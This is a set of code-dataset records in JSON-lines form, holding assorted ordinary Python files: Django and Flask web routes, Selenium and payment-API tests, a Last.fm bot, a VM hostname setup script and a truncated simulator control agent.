Create a router and register our viewsets with it.\n\nrouter = routers.DefaultRouter()\n\n\nrouter.register(r'admin', views.AdminViewSet)\n\nrouter.register(r'users', views.UserViewSet)\n\n\nrouter.register(r'groups', views.GroupViewSet)\n\n\nrouter.register(r'student', views.StudentViewSet)\n\nrouter.register(r'professor', views.ProfessorViewSet)\n\n\n\nrouter.register(r'course', views.CourseViewSet)\n\nrouter.register(r'section', views.SectionViewSet)\n\nrouter.register(r'announcement', views.AnnouncementViewSet)\n\nrouter.register(r'assignment', views.AssignmentViewSet)\n\nrouter.register(r'enrollment', views.EnrollmentViewSet)\n\nrouter.register(r'studentAssignment', views.StudentAssignmentViewSet)\n\n\n\n\n# Wire up our API using automatic URL routing.\n# Additionally, we include login URLs for the browsable API.\n# register the views with the URL conf as usual.\n# The API URLs are now determined automatically by the router\nurlpatterns = [\n\n    path('', include(router.urls)),\n\n    path('students/', student_list, name='student-list'),\n\n    path('students/<int:pk>/', student_detail, name='student-detail'),\n    \n    path('professors/', professor_list, name='professor-list'),\n\n    path('professors/<int:pk>/', professor_detail, name='professor-detail'),\n\n    \n    path('admin/', admin_list, name='user-list'),\n\n    
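# Detail routes capture the target record's primary key with the <int:pk> path converter.\n    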
path('admin/<int:pk>/', admin_detail, name='user-detail'),\n\n\n    path('course/', course_list, name='user-list'),\n\n    path('course/<int:pk>/', course_detail, name='user-detail'),\n\n\n    path('section/', section_list, name='user-list'),\n\n    path('section/<int:pk>/', section_detail, name='user-detail'),\n\n\n    path('announcement/', announcement_list, name='user-list'),\n\n    path('announcement/<int:pk>/', announcement_detail, name='user-detail'),\n\n\n    path('assignment/', assignment_list, name='user-list'),\n\n    path('assignment/<int:pk>/', assignment_detail, name='user-detail'),\n\n\n    path('enrollment/',enrollment_list, name='user-list'),\n\n    path('enrollment/<int:pk>/', enrollment_detail, name='user-detail'),\n\n\n\n    path('studentAssignment/',studentAssignment_list, name='user-list'),\n\n    path('studentAssignment/<int:pk>/', studentAssignment_detail, name='user-detail'),\n\n\n    path('users/', user_list, name='user-list'),\n\n    path('users/<int:pk>/', user_detail, name='user-detail'),\n\n    path('api-auth/', include('rest_framework.urls', namespace='rest_framework'))\n]","sub_path":"cms_project/cmsApi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":6570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"43723135","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf.urls.static import static # new\nfrom django.conf import settings # new\n\nurlpatterns = [\n    path('admin/', admin.site.urls),\n    path('api/posts/', include('apps.post.urls')),\n    path('api/channels/', include('apps.channel.urls')),\n    path('api/auth/', include('apps.user.urls')),\n    path('', include('rest_framework.urls')),\n    path('api/feed/', include('apps.home.urls')),\n    path('api/notification/', include('apps.notification.urls')),\n]\n\nif settings.DEBUG: # new\n    urlpatterns += static(settings.MEDIA_URL,\n                          document_root=settings.MEDIA_ROOT)\n","sub_path":"backend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"240254784","text":"from flask import Flask, request, jsonify, abort\nfrom flask_cors import CORS\nfrom datetime import datetime\nfrom emoji_feedback import EmojiFeedbackSensor\n\napp = Flask(__name__)\nCORS(app)\n\n# faking actor, edApp, and session\nactor = {\n    'id': 'urn:uuid:1a02e4fc-24c1-11e9-ab14-d663bd873d93',\n    'type': 'Person',\n    'name': 'First Last',\n    'dateCreated': datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z'\n}\n\nedApp = {\n    'id': \"urn:uuid:3a02e4fc-24c1-11e9-ab14-d663bd873d93\",\n    'type': 'SoftwareApplication'\n}\n\nsession = {\n    'id': \"urn:uuid:4a02e4fc-24c1-11e9-ab14-d663bd873d93\",\n    'type': 'Session'\n}\n\n@app.route('/')\ndef hello():\n    return 'Hello, World!'\n\n@app.route('/emoji', methods=['POST'])\ndef emoji():\n    req_data = request.get_json()\n    object = req_data.get('object')\n    eventTime = req_data.get('eventTime')\n    selections = req_data.get('selections')\n    question = req_data.get('question')\n\n    feedback_sensor = EmojiFeedbackSensor(debug=True)\n    feedback_sensor.send_emoji_feedback(\n        eventTime=eventTime,\n        actor=actor,\n        object=object,\n        edApp=edApp,\n        session=session,\n        question=question,\n        selections=selections\n    )\n\n    resp = jsonify(success=True)\n    return resp\n\n@app.route('/feedback', methods=['POST'])\ndef feedback():\n    req_data = request.get_json()\n    object = req_data.get('object')\n    eventTime = req_data.get('eventTime')\n    feedback = req_data.get('feedback')\n    questionText = req_data.get('questionText')\n\n    
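# Reuse the module-level fake actor/edApp/session defined above; only the request payload varies per event.\n    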
feedback_sensor = EmojiFeedbackSensor(debug=True)\n feedback_sensor.send_comment_feedback(\n eventTime=eventTime,\n actor=actor,\n object=object,\n edApp=edApp,\n session=session,\n questionText=questionText,\n commentText=feedback\n )\n\n resp = jsonify(success=True)\n return resp\n\n# @app.route('/votes', methods=['GET'])\n# def votes():\n# return jsonify({'votes': 2715})\n\nif __name__ == \"__main__\":\n import sys\n import logging\n logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)\n app.run(host=\"0.0.0.0\", debug=True)","sub_path":"example/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"185044172","text":"# -*- coding: utf-8 -*-\n\"\"\"ExRed Footer Page Object.\"\"\"\nimport logging\n\nfrom selenium import webdriver\n\nfrom utils import assertion_msg, selenium_action, take_screenshot\n\nNAME = \"ExRed Footer\"\nURL = None\n\nSECTIONS = {\n \"export readiness\": {\n \"label\": \"#footer-links-2\",\n \"new\": \"#footer-links-2 ~ ul > li:nth-child(1) > a\",\n \"occasional\": \"#footer-links-2 ~ ul > li:nth-child(2) > a\",\n \"regular\": \"#footer-links-2 ~ ul > li:nth-child(3) > a\",\n \"i'm new to exporting\": \"#footer-links-2 ~ ul > li:nth-child(1) > a\",\n \"i export occasionally\": \"#footer-links-2 ~ ul > li:nth-child(2) > a\",\n \"i'm a regular exporter\": \"#footer-links-2 ~ ul > li:nth-child(3) > a\"\n },\n \"guidance\": {\n \"label\": \"#footer-links-3\",\n \"market research\": \"#footer-links-3 ~ ul a[href='/market-research']\",\n \"customer insight\": \"#footer-links-3 ~ ul a[href='/customer-insight']\",\n \"finance\": \"#footer-links-3 ~ ul a[href='/finance']\",\n \"business planning\": \"#footer-links-3 ~ ul a[href='/business-planning']\",\n \"getting paid\": \"#footer-links-3 ~ ul a[href='/getting-paid']\",\n \"operations and compliance\": \"#footer-links-3 ~ ul a[href='/operations-and-compliance']\"\n },\n \"services\": {\n \"label\": \"#footer-links-4\",\n \"export opportunities\": \"#footer-links-4 ~ ul > li:nth-child(1) > a\",\n \"selling online overseas\": \"#footer-links-4 ~ ul > li:nth-child(2) > a\",\n \"find a buyer\": \"#footer-links-4 ~ ul > li:nth-child(3) > a\",\n \"get finance\": \"#footer-links-4 ~ ul > li:nth-child(4) > a\",\n \"events\": \"#footer-links-4 ~ ul > li:nth-child(5) > a\"\n },\n \"general links\": {\n \"part of great.gov.uk\": \"#footer > .site-links > ul > li:nth-child(1) > a\",\n \"about\": \"#footer > .site-links > ul > li:nth-child(2) > a\",\n \"contact us\": \"#footer > .site-links > ul > li:nth-child(3) > a\",\n \"privacy and cookies\": \"#footer > .site-links > ul > li:nth-child(4) > a\",\n \"terms and conditions\": \"#footer > .site-links > ul > li:nth-child(5) > a\",\n \"department for international trade\": \"#footer > .site-links > ul > li:nth-child(6) > a\"\n }\n}\n\n\ndef should_see_all_menus(driver: webdriver):\n for section in SECTIONS:\n for name, selector in SECTIONS[section].items():\n logging.debug(\n \"Looking for '%s' link in '%s' section with '%s' selector\",\n name, section, selector)\n with selenium_action(\n driver, \"Could not find '%s link' using '%s'\",\n name, selector):\n element = driver.find_element_by_css_selector(selector)\n with assertion_msg(\n \"It looks like '%s' in '%s' section is not visible\",\n name, section):\n assert element.is_displayed()\n logging.debug(\"All elements in '%s' section are visible\", section)\n logging.debug(\n \"All expected sections on %s 
are visible\", NAME)\n\n\ndef open(driver: webdriver, group: str, element: str):\n    link = SECTIONS[group.lower()][element.lower()]\n    button = driver.find_element_by_css_selector(link)\n    assert button.is_displayed()\n    button.click()\n    take_screenshot(\n        driver, NAME + \" after clicking on: {} link\".format(element))\n","sub_path":"tests/exred/pages/footer.py","file_name":"footer.py","file_ext":"py","file_size_in_byte":3342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"420708400","text":"import pytest\nfrom ..model_base_test import ModelBaseTest\nfrom tests.sampleresponse.direct_debit import payment_method_response\nfrom xendit.models import DirectDebit, DirectDebitPaymentMethodType\n\n\n# fmt: off\nclass TestCreatePaymentMethod(ModelBaseTest):\n    @pytest.fixture\n    def default_payment_method_data(self):\n        tested_class = DirectDebit\n        class_name = \"DirectDebit\"\n        method_name = \"create_payment_method\"\n        http_method_name = \"post\"\n        properties = DirectDebit.helper_create_payment_method_properties(\n            id='la-fac7e744-ab40-4100-a447-cbbb16f29ded',\n        )\n        args = ()\n        kwargs = {\n            \"customer_id\": \"ed20b5db-df04-41fc-8018-8ea4ac4d1030\",\n            \"type\": DirectDebitPaymentMethodType.DEBIT_CARD,\n            \"properties\": properties,\n        }\n        params = (args, kwargs)\n        url = \"/payment_methods\"\n        expected_correct_result = payment_method_response()\n        return (tested_class, class_name, method_name, http_method_name, url, params, expected_correct_result)\n\n    @pytest.fixture\n    def api_requestor_request_data(self, default_payment_method_data):\n        tested_class, class_name, method_name, http_method_name, url, params, _ = default_payment_method_data\n        headers = {}\n        body = {\n            \"customer_id\": \"ed20b5db-df04-41fc-8018-8ea4ac4d1030\",\n            \"type\": \"DEBIT_CARD\",\n            \"properties\": {\n                'id': 'la-fac7e744-ab40-4100-a447-cbbb16f29ded'\n            },\n        }\n        return (tested_class, class_name, method_name, http_method_name, url, params, headers, body)\n\n    @pytest.mark.parametrize(\"mock_correct_response\", [payment_method_response()], indirect=True)\n    def test_return_payment_method_on_correct_params(\n        self, mocker, mock_correct_response, default_payment_method_data\n    ):\n        self.run_success_return_test_on_xendit_instance(mocker, mock_correct_response, default_payment_method_data)\n\n    def test_raise_xendit_error_on_response_error(\n        self, mocker, mock_error_request_response, default_payment_method_data\n    ):\n        self.run_raises_error_test_on_xendit_instance(mocker, mock_error_request_response, default_payment_method_data)\n\n    @pytest.mark.parametrize(\"mock_correct_response\", [payment_method_response()], indirect=True)\n    def test_return_payment_method_on_correct_params_and_global_xendit(\n        self, mocker, mock_correct_response, default_payment_method_data\n    ):\n        self.run_success_return_test_on_global_config(mocker, mock_correct_response, default_payment_method_data)\n\n    def test_raise_xendit_error_on_response_error_and_global_xendit(\n        self, mocker, mock_error_request_response, default_payment_method_data\n    ):\n        self.run_raises_error_test_on_global_config(mocker, mock_error_request_response, default_payment_method_data)\n\n    @pytest.mark.parametrize(\"mock_correct_response\", [payment_method_response()], indirect=True)\n    def test_send_correct_request_to_api_requestor(self, mocker, mock_correct_response, api_requestor_request_data):\n        self.run_send_correct_request_to_api_requestor(mocker, mock_correct_response, api_requestor_request_data)\n# fmt: 
on\n","sub_path":"tests/unit/models/directdebit/test_create_payment_method.py","file_name":"test_create_payment_method.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"292035120","text":"# -*- coding: utf-8 -*-\nfrom io import StringIO\nfrom collections import Counter\nimport math\n\ndef count_sentences_with_word_long(f):\n    cnt = Counter() \n    for l in f:\n        words_set = set(l.split())\n        cnt.update(words_set)\n    return cnt\n    \ndef build_cooc_table(f1, f2):\n    lines_src = f1.readlines()\n\n    lines_tgt = f2.readlines()\n    r = dict()\n    for i in range(len(lines_src)):\n        words_set_src = set(lines_src[i].split())\n        words_set_tgt = set(lines_tgt[i].split())\n        for w_src in words_set_src:\n            for w_tgt in words_set_tgt:\n                key = (w_src, w_tgt)\n                if key in r:\n                    r[key]+=1\n                else:\n                    r[key]=1 \n\n    return r\n    \n\ndef pair_likelihood(f1, f2, fr_w, en_w):\n    pair = (fr_w, en_w)\n    \n    n_a = fr_oc_table.get(fr_w)\n    \n    p_a = n_a/N\n    \n    n_b = en_oc_table.get(en_w)\n    p_b = n_b/N\n    \n    n_not_a = N - n_a\n    p_na = n_not_a/N\n    \n    n_not_b = N - n_b\n    p_nb = n_not_b/N\n    \n    n_a_and_b = cooc_table.get(pair)\n    p_n_a_and_b = n_a_and_b/N\n    \n    n_not_a_and_b = n_b - n_a_and_b  # sentences containing en_w but not fr_w\n    p_n_not_a_and_b = n_not_a_and_b/N\n\n    n_a_and_not_b = n_a - n_a_and_b  # sentences containing fr_w but not en_w\n    p_n_a_and_not_b = n_a_and_not_b/N\n    \n    n_not_a_and_not_b = N - n_a - n_b + n_a_and_b\n    p_n_not_a_and_not_b = n_not_a_and_not_b/N\n    \n    r = p_n_not_a_and_not_b * math.log(p_n_not_a_and_not_b/(p_na*p_nb), 2)\n\n    r+= p_n_not_a_and_b * math.log(p_n_not_a_and_b/(p_na*p_b), 2)\n    \n    r+= p_n_a_and_not_b * math.log(p_n_a_and_not_b/ (p_a * p_nb), 2)\n    r+= p_n_a_and_b * math.log(p_n_a_and_b /(p_a*p_b), 2)\n    \n    r*= 2 * N\n    \n    return r\n    \n    \n\nf1 = open(\"french.corpus\", 'r')\nf2 = open(\"english.corpus\", 'r')\nfr_oc_table = count_sentences_with_word_long(f1)\nen_oc_table = count_sentences_with_word_long(f2)\nf1 = open(\"french.corpus\", 'r')\nf2 = open(\"english.corpus\", 'r')\ncooc_table = build_cooc_table(f1,f2)\nf1 = open(\"french.corpus\", 'r')\nN = len(f1.readlines())\n\n\nprint(pair_likelihood(f1,f2, \"dans\", \"the\"))","sub_path":"intro_appr/TP1/lexicon_extraction.py","file_name":"lexicon_extraction.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"168147357","text":"\"\"\"\nLast.fm now playing and music comparisons.\n\nAllow users to display their now playing status and compare music tastes using\nLast.fm.\n\"\"\"\n\nimport requests\nimport gzip\nimport humanize\nfrom datetime import datetime\nfrom lxml import etree\n\nfrom kochira import config\nfrom kochira.userdata import UserData\nfrom kochira.service import Service, background, Config, coroutine\n\nservice = Service(__name__, __doc__)\n\n@service.config\nclass Config(Config):\n    api_key = config.Field(doc=\"Last.fm API key.\")\n\n\ndef query_lastfm(api_key, method, arguments):\n    params = arguments.copy()\n    params.update({\n        \"method\": method,\n        \"api_key\": api_key\n    })\n\n    r = requests.get(\n        \"http://ws.audioscrobbler.com/2.0/\",\n        params=params,\n        stream=True\n    )\n\n    return etree.parse(gzip.GzipFile(fileobj=r.raw))\n\n\ndef get_compare_users(api_key, user1, user2):\n    res = query_lastfm(\n        api_key,\n        \"tasteometer.compare\",\n        {\n            \"type1\": \"user\",\n            \"type2\": \"user\",\n            \"value1\": user1,\n            \"value2\": user2\n        }\n    )\n\n    comparison = res.xpath(\"/lfm[@status='ok']/comparison/result\")\n\n    if comparison:\n        comparison, = 
comparison\n\n        score, = comparison.xpath(\"score/text()\")\n        artists = comparison.xpath(\"artists/artist/name/text()\")\n\n        return {\n            \"user1\": user1,\n            \"user2\": user2,\n            \"score\": float(score),\n            \"artists\": artists\n        }\n\n    return None\n\n\ndef get_user_now_playing(api_key, user):\n    res = query_lastfm(\n        api_key,\n        \"user.getRecentTracks\",\n        {\n            \"user\": user,\n            \"limit\": 1\n        }\n    )\n\n    track = res.xpath(\"/lfm[@status='ok']/recenttracks/track[@nowplaying='true']\")\n\n    now_playing = True\n\n    if not track:\n        track = res.xpath(\"/lfm[@status='ok']/recenttracks/track\")\n        now_playing = False\n\n    if track:\n        track = track[0]\n\n        artist, = track.xpath(\"artist/text()\")\n        name, = track.xpath(\"name/text()\")\n        album, = track.xpath(\"album/text()\") or [None]\n        ts, = track.xpath(\"date/@uts\") or [None]\n\n        ts = int(ts) if ts is not None else None\n\n        # get track info\n        track_tags_r = query_lastfm(\n            api_key,\n            \"track.getTopTags\", {\n                \"artist\": artist,\n                \"track\": name\n            }\n        )\n        tags = track_tags_r.xpath(\"/lfm[@status='ok']/toptags/tag/name/text()\")\n\n        track_info_r = query_lastfm(\n            api_key,\n            \"track.getInfo\", {\n                \"username\": user,\n                \"artist\": artist,\n                \"track\": name\n            }\n        )\n        info = track_info_r.xpath(\"/lfm[@status='ok']/track\")\n\n        if info:\n            info, = info\n\n            user_playcount, = info.xpath(\"userplaycount/text()\") or [0]\n            user_playcount = int(user_playcount)\n\n            user_loved, = info.xpath(\"userloved/text()\") or [0]\n            user_loved = int(user_loved)\n        else:\n            user_playcount = 0\n            user_loved = 0\n\n        return {\n            \"user\": user,\n            \"artist\": artist,\n            \"name\": name,\n            \"album\": album,\n            \"tags\": tags,\n            \"ts\": ts,\n            \"user_playcount\": user_playcount,\n            \"user_loved\": user_loved,\n            \"now_playing\": now_playing\n        }\n\n    return None\n\n\n@coroutine\ndef get_lfm_username(client, who):\n    user_data = yield UserData.lookup_default(client, who)\n    return user_data.get(\"lastfm_user\", who)\n\n\n@service.command(r\"!lfm (?P<lfm_username>\S+)$\")\n@service.command(r\"my last\.fm username is (?P<lfm_username>\S+)$\", mention=True)\n@coroutine\ndef setup_user(ctx, lfm_username):\n    \"\"\"\n    Set username.\n\n    Associate a Last.fm username with your nickname.\n    \"\"\"\n\n    try:\n        user_data = yield UserData.lookup(ctx.client, ctx.origin)\n    except UserData.DoesNotExist:\n        ctx.respond(ctx._(\"You must be logged in to set your Last.fm username.\"))\n        return\n\n    user_data[\"lastfm_user\"] = lfm_username\n    user_data.save()\n\n    ctx.respond(ctx._(\"You have been associated with the Last.fm username {user}.\").format(user=lfm_username))\n\n\n@service.command(r\"!lfm$\")\n@service.command(r\"what is my last\.fm username\??$\", mention=True)\n@coroutine\ndef check_user(ctx):\n    \"\"\"\n    Get username.\n\n    Get your Last.fm username.\n    \"\"\"\n\n    try:\n        user_data = yield UserData.lookup(ctx.client, ctx.origin)\n    except UserData.DoesNotExist:\n        ctx.respond(ctx._(\"You must be logged in to set your Last.fm username.\"))\n        return\n\n    if \"lastfm_user\" not in user_data:\n        ctx.respond(ctx._(\"You don't have a Last.fm username associated with your nickname. 
Please use \\\"!lfm\\\" to associate one.\"))\n        return\n\n    ctx.respond(ctx._(\"Your nickname is associated with {user}.\").format(user=user_data[\"lastfm_user\"]))\n\n\n@service.command(r\"!tasteometer (?P<user1>\S+) (?P<user2>\S+)$\")\n@service.command(r\"!tasteometer (?P<user2>\S+)$\")\n@service.command(r\"compare my last\.fm with (?P<user2>\S+)$\", mention=True)\n@service.command(r\"compare (?P<user1>\S+) and (?P<user2>\S+) on last\.fms$\", mention=True)\n@background\n@coroutine\ndef compare_users(ctx, user2, user1=None):\n    \"\"\"\n    Tasteometer.\n\n    Compare the music tastes of two users.\n    \"\"\"\n    if user1 is None:\n        user1 = ctx.origin\n\n    lfm1 = yield ctx.bot.defer_from_thread(get_lfm_username, ctx.client, user1)\n    lfm2 = yield ctx.bot.defer_from_thread(get_lfm_username, ctx.client, user2)\n\n    comparison = get_compare_users(ctx.config.api_key, lfm1, lfm2)\n\n    if comparison is None:\n        ctx.respond(ctx._(\"Couldn't compare.\"))\n        return\n\n    ctx.respond(ctx._(\"{user1} ({lfm1}) and {user2} ({lfm2}) are {score:.2%} similar: {artists}\").format(\n        user1=user1,\n        lfm1=lfm1,\n        user2=user2,\n        lfm2=lfm2,\n        score=comparison[\"score\"],\n        artists=\", \".join(comparison[\"artists\"])\n    ))\n\n\n@service.command(r\"!np$\")\n@service.command(r\"!np (?P<who>\S+)$\")\n@service.command(r\"what am i playing\??$\", mention=True)\n@service.command(r\"what is (?P<who>\S+) playing\??$\", mention=True)\n@background\n@coroutine\ndef now_playing(ctx, who=None):\n    \"\"\"\n    Now playing.\n\n    Get the currently playing song for a user.\n    \"\"\"\n    if who is None:\n        who = ctx.origin\n\n    lfm = yield get_lfm_username(ctx.client, who)\n    track = get_user_now_playing(ctx.config.api_key, lfm)\n\n    if track is None:\n        ctx.respond(ctx._(\"{who} ({lfm}) has never scrobbled anything.\").format(\n            who=who,\n            lfm=lfm\n        ))\n        return\n\n    track_descr = ctx._(\"{artist} - {name}{album}{tags} (played {playcount} time{s})\").format(\n        name=track[\"name\"],\n        artist=track[\"artist\"],\n        album=(\" - \" + track[\"album\"]) if track[\"album\"] else \"\",\n        tags=(\" (\" + \", \".join(track[\"tags\"][:5]) + \")\") if track[\"tags\"] else \"\",\n        playcount=track[\"user_playcount\"],\n        s=\"s\" if track[\"user_playcount\"] != 1 else \"\",\n    )\n\n    if not track[\"now_playing\"]:\n        ctx.respond(ctx._(\"{who} ({lfm}) was playing about {dt}: {descr}\").format(\n            who=who,\n            lfm=lfm,\n            dt=humanize.naturaltime(datetime.fromtimestamp(track[\"ts\"])),\n            descr=track_descr\n        ))\n    else:\n        ctx.respond(ctx._(\"{who} ({lfm}) is playing: {descr}\").format(\n            who=who,\n            lfm=lfm,\n            descr=track_descr\n        ))\n","sub_path":"kochira/services/web/lastfm.py","file_name":"lastfm.py","file_ext":"py","file_size_in_byte":7494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"42066458","text":"_world = {}\nstarting_position = (0, 0)\n\n\ndef load_map_tiles():\n    \"\"\"\n    Parse a file describing the world space into the _world dictionary.\n    (x, y) tuple is used as a dictionary key, and the tile name serves\n    as the value.\n    \"\"\"\n    with open('resources/map.txt', 'r') as file:\n        rows = file.readlines()\n\n    # Set the row length.\n    x_max = len(rows[0].split(','))\n\n    for y in range(len(rows)):\n        columns = rows[y].split(',')\n        for x in range(x_max):\n            # Replace newline at the end of the tile name.\n            tile_name = columns[x].replace('\\n', '')\n            if tile_name == 'StartingRoom':\n                global starting_position\n                starting_position = (x, y)\n            if tile_name == '':\n                _world[(x, y)] = None\n            else:\n                _world[(x, y)] = getattr(__import__('map'), tile_name)(x, y)\n\n\ndef tile_exists(x, y):\n    return 
_world.get((x, y))\n","sub_path":"world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"336588954","text":"class Solution:\r\n def grayCode(self, n: 'int') -> 'List[int]':\r\n if not n:\r\n return [0]\r\n \r\n else:\r\n pre = self.grayCode(n-1)\r\n post = [x + 2**(n-1) for x in pre[::-1]]\r\n return pre + post\r\n\r\ns = Solution()\r\nn = 5\r\nprint(s.grayCode(n))","sub_path":"leetcode/python/grayCode.py","file_name":"grayCode.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"151358884","text":"import os\nimport pymongo\nimport re, uuid\nimport time\nimport subprocess\nfrom subprocess import Popen, PIPE\n\n\nclass GetDataFromMongo(object):\n def __init__(self, host=\"173.37.49.29\"):\n self.host = host\n\n def getvminfo(self, vmmacc):\n try:\n client = pymongo.MongoClient(\"mongodb://{0}:2701/\".format(self.host), connectTimeoutMS=60000)\n mydb = client[\"vmdb\"]\n mycoll = mydb[\"vminfo\"]\n mydict = {\"vmmacc\": vmmacc}\n vmname = mycoll.find_one(mydict).get(\"vmname\")\n server_type = mycoll.find_one(mydict).get(\"servertype\")\n return vmname, server_type\n except Exception as e:\n print(\"Error is %s\" % e)\n\n def getipinfo(self, ipaddr):\n try:\n client = pymongo.MongoClient(\"mongodb://{0}:2701/\".format(self.host), connectTimeoutMS=60000)\n mydb = client[\"ipmgr\"]\n mycoll = mydb[\"ippool\"]\n mydict = {\"ipaddr\": ipaddr}\n ret = mycoll.find_one(mydict)\n return ret.get('netmask'), ret.get('gateway'), ret.get('vlanid')\n except Exception as e:\n print(\"Error is %s\" % e)\n\n\ndef isipalive():\n p = subprocess.Popen(\"nslookup qa.webex.com\", stdin=PIPE, stdout=PIPE, shell=True)\n ret = p.stdout.readline()\n try:\n ret = re.match('Server', ret).group()\n return True\n except Exception as e:\n return False\n\n\ngdfm = GetDataFromMongo()\n\ntimeout = 0\nwhile timeout <= 30:\n if isipalive():\n print(\"IP is Alive\")\n break\n else:\n time.sleep(3)\n timeout += 3\n\n\nif not os.path.exists(r\"/vmconfig/.changedhostname\"):\n time.sleep(5)\n vmmacc = ':'.join(re.findall('..', '%012x' % uuid.getnode()))\n print(\"vmmacc is \", vmmacc)\n try:\n vmname, server_type = gdfm.getvminfo(vmmacc)\n except Exception as e:\n print(\"Didn't get vmname from Cassandra vmdb.\")\n print(\"vmname is %s, server type is %s\" % (vmname, server_type))\n hostname, ipaddr = vmname.split('-', 1)\n ipaddr = re.sub('-ct76', '', ipaddr)\n try:\n netmask, gateway, vlanid = gdfm.getipinfo(ipaddr.split('-', 1)[0])\n except Exception as e:\n print(\"Didn't get ipaddr from Cassandra ipmgr db.\")\n cmd = \"sh /vmconfig/vmconfig.sh {0} {1} {2} {3} {4} > /vmconfig/vmconfig.log 2>&1\".format(hostname, ipaddr, netmask,\n gateway, server_type)\n\n if hostname and ipaddr:\n print(cmd)\n os.system(cmd)\n with open(r\"/vmconfig/.changedhostname\", 'w+') as f:\n f.write(\"Changed hostname {0} macc {1} done!\".format(hostname, vmmacc))\n os.system(\"sed -i 's/^python/#python/g' /etc/rc.d/rc.local\")\n os.system(\"sed -i 's/^sh/#sh/g' /etc/rc.d/rc.local\")\n os.system(\"reboot\")\n","sub_path":"vmda/changehostname.py","file_name":"changehostname.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"479136776","text":"import random as ran\nimport matplotlib.pylab as plt\nfrom torch import multiprocessing as 
mp\n\nfrom CNS_UDP_FAST import CNS\nfrom AB_PPO.V4_3_Net_Model_Torch import *\n\nimport copy\nfrom collections import deque\n\n\nclass Work_info:  # data storage and selection of the initial input variables\n    def __init__(self):\n        self.CURNET_COM_IP = '192.168.0.10'\n        self.CNS_IP_LIST = ['192.168.0.9', '192.168.0.7', '192.168.0.4']\n        self.CNS_PORT_LIST = [7100, 7200, 7300]\n        self.CNS_NUMBERS = [5, 0, 0]\n\n        self.TimeLeg = 10\n\n        # TO CNS_UDP_FAST.py\n        self.UpdateIterval = 5\n\n    def WInfoWarp(self):\n        Info = {\n            'Iter': 0\n        }\n        print('초기 Info Share mem로 선언')\n        return Info\n\n\nclass Agent(mp.Process):\n    def __init__(self, GlobalNet, MEM, CNS_ip, CNS_port, Remote_ip, Remote_port):\n        mp.Process.__init__(self)\n        # Network info\n        self.GlobalNet = GlobalNet\n        self.LocalNet = NETBOX()\n        for _ in range(0, self.LocalNet.NubNET):\n            self.LocalNet.NET[_].load_state_dict(self.GlobalNet.NET[_].state_dict())\n        self.LocalOPT = NETOPTBOX(NubNET=self.LocalNet.NubNET, NET=self.GlobalNet.NET)\n        # CNS\n        self.CNS = CNS(self.name, CNS_ip, CNS_port, Remote_ip, Remote_port)\n        # SharedMem\n        self.mem = MEM\n        self.LocalMem = copy.deepcopy(self.mem)\n        # Work info\n        self.W = Work_info()\n        # GP Setting\n        self.fig_dict = {i_: plt.figure(figsize=(13, 13)) for i_ in [\"ZINST58\", \"ZINST63\", \"ZVCT\", \"BFV122\", \"BPV145\"]}\n        self.ax_dict = {i_: self.fig_dict[i_].add_subplot() for i_ in [\"ZINST58\", \"ZINST63\", \"ZVCT\", \"BFV122\", \"BPV145\"]}\n        print(f'Make -- {self}')\n\n    # ==============================================================================================================\n    # part that sends the control signals\n    def send_action_append(self, pa, va):\n        for _ in range(len(pa)):\n            self.para.append(pa[_])\n            self.val.append(va[_])\n\n    def send_action(self, act):\n        # lists holding the parameters and values to transmit\n        self.para = []\n        self.val = []\n\n        # transmit the final parameters\n        self.CNS._send_control_signal(self.para, self.val)\n    #\n    # ==============================================================================================================\n    # build the input/output values\n    def InitialStateSet(self):\n        self.PhyPara = ['ZINST58', 'ZINST63', 'ZVCT']\n        self.PhyState = {_: deque(maxlen=self.W.TimeLeg) for _ in self.PhyPara}\n\n        self.COMPPara = ['BFV122', 'BPV145']\n        self.COMPState = {_: deque(maxlen=self.W.TimeLeg) for _ in self.COMPPara}\n\n    def MakeStateSet(self):\n        # accumulate the values (return Dict)\n        [self.PhyState[_].append(self.PreProcessing(_, self.CNS.mem[_]['Val'])) for _ in self.PhyPara]\n        [self.COMPState[_].append(self.PreProcessing(_, self.CNS.mem[_]['Val'])) for _ in self.COMPPara]\n\n        # convert to tensors\n        self.S_Py = torch.tensor([self.PhyState[key] for key in self.PhyPara])\n        self.S_Py = self.S_Py.reshape(1, self.S_Py.shape[0], self.S_Py.shape[1])\n        self.S_Comp = torch.tensor([self.COMPState[key] for key in self.COMPPara])\n        self.S_Comp = self.S_Comp.reshape(1, self.S_Comp.shape[0], self.S_Comp.shape[1])\n\n        # latest single values as plain lists\n        self.S_ONE_Py = [self.PhyState[key][-1] for key in self.PhyPara]\n        self.S_ONE_Comp = [self.COMPState[key][-1] for key in self.COMPPara]\n\n    def PreProcessing(self, para, val):\n        if para == 'ZINST58': val = round(val/1000, 6)  # pressurizer pressure\n        if para == 'ZINST63': val = round(val/100, 6)   # pressurizer level\n        if para == 'ZVCT': val = round(val/100, 5)      # VCT level\n        return val\n\n    # ==============================================================================================================\n\n    def run(self):\n        while True:\n            size, maltime = ran.randint(100, 600), ran.randint(30, 100) * 